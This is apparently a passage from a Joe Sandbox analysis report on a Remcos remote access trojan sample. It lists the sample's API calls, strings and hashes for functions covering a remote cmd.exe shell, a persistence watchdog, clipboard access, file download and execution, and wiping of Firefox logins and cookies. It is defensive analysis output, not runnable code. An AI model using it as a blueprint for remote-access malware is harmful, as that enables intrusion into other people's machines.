                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                      • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                      • API String ID: 4236061018-3687161714
                                      • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                      • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                      • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                      • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                      • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                      • ExitProcess.KERNEL32 ref: 004432EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID: PkGNG
                                      • API String ID: 1703294689-263838557
                                      • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                      • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                      • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                      • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • SetEvent.KERNEL32(?), ref: 00404E43
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                      • closesocket.WS2_32(?), ref: 00404E5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                      • SetEvent.KERNEL32(?), ref: 00404EA2
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                      • SetEvent.KERNEL32(?), ref: 00404EBA
                                      • CloseHandle.KERNEL32(?), ref: 00404EBF
                                      • CloseHandle.KERNEL32(?), ref: 00404EC4
                                      • SetEvent.KERNEL32(?), ref: 00404ED1
                                      • CloseHandle.KERNEL32(?), ref: 00404ED6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                      • String ID: PkGNG
                                      • API String ID: 2403171778-263838557
                                      • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                      • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                      • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                      • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 30 448566-44857a 31 448587-4485a2 LoadLibraryExW 30->31 32 44857c-448585 30->32 34 4485a4-4485ad GetLastError 31->34 35 4485cb-4485d1 31->35 33 4485de-4485e0 32->33 36 4485bc 34->36 37 4485af-4485ba LoadLibraryExW 34->37 38 4485d3-4485d4 FreeLibrary 35->38 39 4485da 35->39 41 4485be-4485c0 36->41 37->41 38->39 40 4485dc-4485dd 39->40 40->33 41->35 42 4485c2-4485c9 41->42 42->40
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                      • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                      • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                      • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                      • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 43 40d069-40d095 call 401fab CreateMutexA GetLastError
                                      APIs
                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                      • GetLastError.KERNEL32 ref: 0040D083
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastMutex
                                      • String ID: SG
                                      • API String ID: 1925916568-3189917014
                                      • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                      • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                      • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                      • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 46 4484ca-4484f4 47 4484f6-4484f8 46->47 48 44855f 46->48 49 4484fe-448504 47->49 50 4484fa-4484fc 47->50 51 448561-448565 48->51 52 448506-448508 call 448566 49->52 53 448520 49->53 50->51 58 44850d-448510 52->58 54 448522-448524 53->54 56 448526-448534 GetProcAddress 54->56 57 44854f-44855d 54->57 59 448536-44853f call 43436e 56->59 60 448549 56->60 57->48 61 448541-448547 58->61 62 448512-448518 58->62 59->50 60->57 61->54 62->52 64 44851a 62->64 64->53
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                      • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                      • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                      • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 66 40165e-401664 67 401666-401668 66->67 68 401669-401674 66->68 69 401676 68->69 70 40167b-401685 68->70 69->70 71 401687-40168d 70->71 72 4016a8-4016a9 call 4344ea 70->72 71->72 73 40168f-401694 71->73 76 4016ae-4016af 72->76 73->69 75 401696-4016a6 call 4344ea 73->75 78 4016b1-4016b3 75->78 76->78
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 94 446137-446143 95 446175-446180 call 4405dd 94->95 96 446145-446147 94->96 103 446182-446184 95->103 98 446160-446171 RtlAllocateHeap 96->98 99 446149-44614a 96->99 100 446173 98->100 101 44614c-446153 call 445545 98->101 99->98 100->103 101->95 106 446155-44615e call 442f80 101->106 106->95 106->98
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                      • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                      • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                      • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                      • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                      • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                        • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                        • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                        • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                      • DeleteFileA.KERNEL32(?), ref: 00408652
                                        • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                        • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                        • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                        • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                      • Sleep.KERNEL32(000007D0), ref: 004086F8
                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                        • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                      • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                      • API String ID: 1067849700-181434739
                                      • Opcode ID: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                                      • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                      • Opcode Fuzzy Hash: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                                      • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004056E6
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • __Init_thread_footer.LIBCMT ref: 00405723
                                      • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                      • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                      • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                      • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                      • CloseHandle.KERNEL32 ref: 00405A23
                                      • CloseHandle.KERNEL32 ref: 00405A2B
                                      • CloseHandle.KERNEL32 ref: 00405A3D
                                      • CloseHandle.KERNEL32 ref: 00405A45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                      • API String ID: 2994406822-18413064
                                      • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                      • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                      • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                      • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 00412106
                                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                        • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                      • CloseHandle.KERNEL32(00000000), ref: 00412155
                                      • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                      • API String ID: 3018269243-13974260
                                      • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                      • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                      • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                      • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                      • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                      • FindClose.KERNEL32(00000000), ref: 0040BD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                      • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                      • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                      • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32 ref: 004168C2
                                      • EmptyClipboard.USER32 ref: 004168D0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                      • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                      • CloseClipboard.USER32 ref: 00416955
                                      • OpenClipboard.USER32 ref: 0041695C
                                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                      • CloseClipboard.USER32 ref: 00416984
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID: !D@
                                      • API String ID: 3520204547-604454484
                                      • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                      • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                      • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                      • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                      • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                      • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                      • FindClose.KERNEL32(00000000), ref: 0040BED0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
